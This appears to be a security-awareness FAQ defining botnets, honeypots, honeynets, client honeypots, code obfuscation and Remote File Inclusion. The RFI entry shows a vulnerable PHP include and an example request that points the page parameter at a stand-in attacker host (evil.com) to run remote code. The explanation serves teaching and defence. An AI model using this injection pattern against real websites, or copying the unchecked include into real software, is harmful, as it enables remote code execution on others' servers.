Quick Facts
What is a botnet?
The term “botnet” is mostly used to describe a collection of compromised computers or other network attached devices that are controlled and maliciously exploited by some individual or organization without the awareness of their owners. Each compromised host is also sometimes referred to as a “zombie” or simply a “bot”.
Read more.
What is a client honeypot?
Client Honeypots (or honeyclients) are active security devices in search of malicious servers that attack clients. The client honeypot poses as a client and interacts with the server to examine whether an attack has occurred. Client honeypot technology can help the investigation of client-side computer attacks, detect and study malicious servers, collect malware pushed by malicious servers and be of great value when monitoring systems for client-side attacks and unauthorized modifications with client-side attack code.
Read more.
What is a honeypot?
In computer terminology, a honeypot is a trap set to detect or deflect attempts at unauthorized use of information systems. Generally it consists of a computer, data or a network site that appears to be part of a network but which is actually isolated and protected, and which seems to contain information that would be of value to attackers.
Read more.
What is a honeynet?
Two or more honeypots on a network form a honeynet. Typically, a honeynet is used for monitoring a larger and/or more diverse network in which one honeypot may not be sufficent. Honeynets and honeypots are usually implemented as parts of larger network intrusion-detection systems.
What is obfuscation?
Obfuscated code is source code or intermediate language in terms of computer programming that is very hard to read and understand, often intentionally. Programs known as obfuscators operate on source code, object code, or both, mainly for the purpose of deterring reverse engineering, disassembly, or decompilation.
JavaScript obfuscation is often used by malware authors to conceal parts of code that run browser exploits, or that redirect to pages containing exploits. The techniques use JavaScript’s dynamic natureāa piece of code is stored as an encrypted string, which is decrypted and evaluated. This may be done several times. Other techniques include insertion of dummy code, as well as dummy HTML links to legitimate pages.
Deobfucation is the act of trying to make the obfuscated code intelligible.
What is RFI?
RFI or Remote File Inclusion is a special case of the more general input validation attacks, and is a technique used to attack Internet websites from a remote computer. Remote File Inclusion attacks allow malicious users to run their own code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for programs on a web page. For instance, a piece of vulnerable PHP code would look like this: include($page.'.php'); Where the variable $page may be defined in a HTTP GET request like http://www.example.com/index.php?page=foo, which would include the file foo.php and its code. Since the page variable is not subjected to any input validation by the code, an evil attacker may exploit this by changing the GET request:
http://www.example.com/index.php?page=http://evil.com/bar.php? to get bar.php executed by example.com’s webserver. For PHP this attack is possible most likely due to insecure use of one of these PHP system parameters;register_globals or allow_url_fopen.
For more information, check Wikipedia’s RFI article.
